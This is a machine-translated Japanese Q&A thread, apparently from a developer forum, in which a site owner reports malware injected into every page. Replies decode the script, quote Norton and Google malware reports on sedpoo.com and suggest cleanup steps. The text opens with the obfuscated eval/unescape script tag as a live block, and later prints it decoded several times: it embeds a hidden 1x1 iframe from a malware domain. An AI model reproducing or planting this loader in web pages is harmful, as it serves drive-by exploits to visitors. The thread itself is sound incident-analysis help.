<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%
74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%
70%3A%2F%2F%73%65%64%70%6F%6F%2E%63%6F%6D%2F%3F%33%33%38%33%
37%35%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%
3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script>
私のウェブサイトwww.safwanmanpower.comは、各ページのマルウェアスクリプトによって攻撃されています。このスクリプトが私のウェブサイトのマルウェアにどのように影響するかは誰にもわかりません。
迅速で前向きな反応を期待しています。
編集
アップロードの許可なしにsumoneが私のWebサイトを攻撃する方法は??
あなたのサイトは既知のエンティティによって侵害されています。あなたのページは現在、訪問者にエクスプロイトを提供しており、訪問者を危険にさらしています。
今すぐサイトを停止して、http ://safeweb.norton.com/report/show?name=sedpoo.comを参照してください。
脅威レポート 見つかった脅威の総数:4 ドライブバイダウンロード(これは何ですか?) 見つかった脅威:3 完全なリストは次のとおりです:(特定の脅威の詳細については、をクリックしてください 以下の脅威名について) 脅威名:HTTP悪意のあるツールキットバリアントアクティビティ15 場所:http://sedpoo.com/?687328 脅威名:HTTP悪意のあるツールキットバリアントアクティビティ15 場所:http://sedpoo.com/?-560137484 脅威名:HTTP悪意のあるツールキットバリアントアクティビティ15 場所:http://sedpoo.com/?2443640 ウイルス(これは何ですか?) 見つかった脅威:1 完全なリストは次のとおりです:(特定の脅威の詳細については、をクリックしてください 以下の脅威名について) 脅威名:Trojan.Gen 場所:http://sedpoo.com/des.jar
そして:http ://www.google.co.uk/safebrowsing/diagnostic?site = sedpoo.com /
sedpoo.comの現在のリストステータスは何ですか? サイトは疑わしいものとしてリストされています-このWebサイトにアクセスすると、コンピューターに損害を与える可能性があります。 Googleがこのサイトにアクセスしたときに何が起こりましたか? 過去90日間にサイトでテストした1887ページのうち、0ページ その結果、悪意のあるソフトウェアがユーザーなしでダウンロードおよびインストールされました 同意。Googleがこのサイトに最後にアクセスしたのは2011年1月18日で、 このサイトで疑わしいコンテンツが最後に見つかったのは2011年1月18日でした。 悪意のあるソフトウェアには、2478のエクスプロイト、2135のトロイの木馬、1508のスクリプトが含まれます。 エクスプロイト。 このサイトは、AS4766(Korea Telecom)を含む8つのネットワークでホストされていました。 AS51306(UAIP)、AS5610(チェコ)。 このサイトは、さらなる配布をもたらす仲介者として機能しましたか? マルウェアの? 過去90日間、sedpoo.comは仲介者として機能しているように見えました feja-islame.com/、yaris-club.net/を含む962サイトの感染について cstbilisi.ge/。 このサイトはマルウェアをホストしていますか? はい、このサイトは過去90日間に悪意のあるソフトウェアをホストしています。それ yaris-club.net/、feja-islame.com/を含む感染した2519ドメイン bhiee.net/。 どうしてそうなった? 場合によっては、サードパーティが正当なサイトに悪意のあるコードを追加する可能性があります。 警告メッセージが表示されます。
あなたが脅威をさらに調査し、その後に発生する可能性のある潜在的な感染に対処する準備ができるまで、私はセドプー攻撃サイトにアクセスしません。仮想マシンを起動してサイトにアクセスすることは、ワークステーションとデータを危険にさらすことなく、さらに調査するための迅速な方法です。
エスケープされていないコードは次のようなものです。
document.wri% 74e('<iframe src="htt% 70://sedpoo.com/?3383% 375" width=1 height=1% 3E</iframe>')
これを評価すると、1px x 1pxのiframeがサイトに追加されます。これは、上記のアドレスを指します。
感染したファイル、スクリプト、難読化されたjavascriptコード、シェルなどをスキャンする(Simple Server Malware Scanner)を使用する必要がありsmscannerます。これまでのところ、LinuxWebサーバーで機能します。
クロームでは、それはに逃げ出し"document.wri% 74e('<iframe src="htt% 70://sedpoo.com/?3383% 375" width=1 height=1% 3E</iframe>')"ます、クロームは私にマルウェアをホストするサイトであると言います。
空白を削除すると、次のようにデコードされます。
document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')
これを取得するには、ここのツールを使用してコードをエスケープ解除します
document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')
これは、1px x 1px(事実上非表示)のiframeをページに埋め込んでいます。ここから、エクスプロイトで訪問者を攻撃したり、単に広告ウィンドウを生成しようとしたりする可能性があります。
難読化されていないJavaScriptコードは次のとおりです。
document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')
そのコードが何をするのかを知りたい場合は、エスケープされたコードをこのURLに貼り付けてください(私はそれを実行しましたが、サイトを別のリンクにリダイレクトしようとしているようです): http ://www.linkedresources.com/tools /unescaper_v0.2b1.html
Webサイトで何らかのコンテンツ管理システム(CMS)を使用していますか?もしそうなら、あなたができる最善のことは、そのCMSのウェブサイトに行き、最新バージョンをダウンロードすることです。
エスケープされていないコードは次のとおりです。
document.write('<iframe src="http://sedpoo.com/?338375" width=1 height=1></iframe>')
http://sedpoo.com/?338375へのiFrameを作成しているのは、広告などのポップアップを生成すると思います。
直接の質問に答えます。すべてのページにスクリプトを挿入するということは、ハッカーがWebサーバー、おそらくホストWebファーム全体を制御できることを意味します。
どのように?多分彼は管理者パスワードを盗んだ。多分彼はホストで働き、彼が植えた裏口を使用します。あなたは本当に知ることはできませんし、あなたがホストされている場合、それはホストの責任であるため、あなたは本当に自分自身を守ることはできません。
ホストされている場合は、他のより信頼性の高いホストを見つけてください。それ以外の場合は、Cfreakがコメントしたとおりに実行し、サーバー上のすべてのパスワードを変更し、新しく強力なファイアウォールなどをインストールします...
編集:サーバーが自分のものである場合(つまり、サードパーティのホストを使用していない場合)、セキュリティイベントログを確認し、感染時に誰がログインしたかを確認します。明らかに、完全なウイルス/マルウェアスキャンを実行します。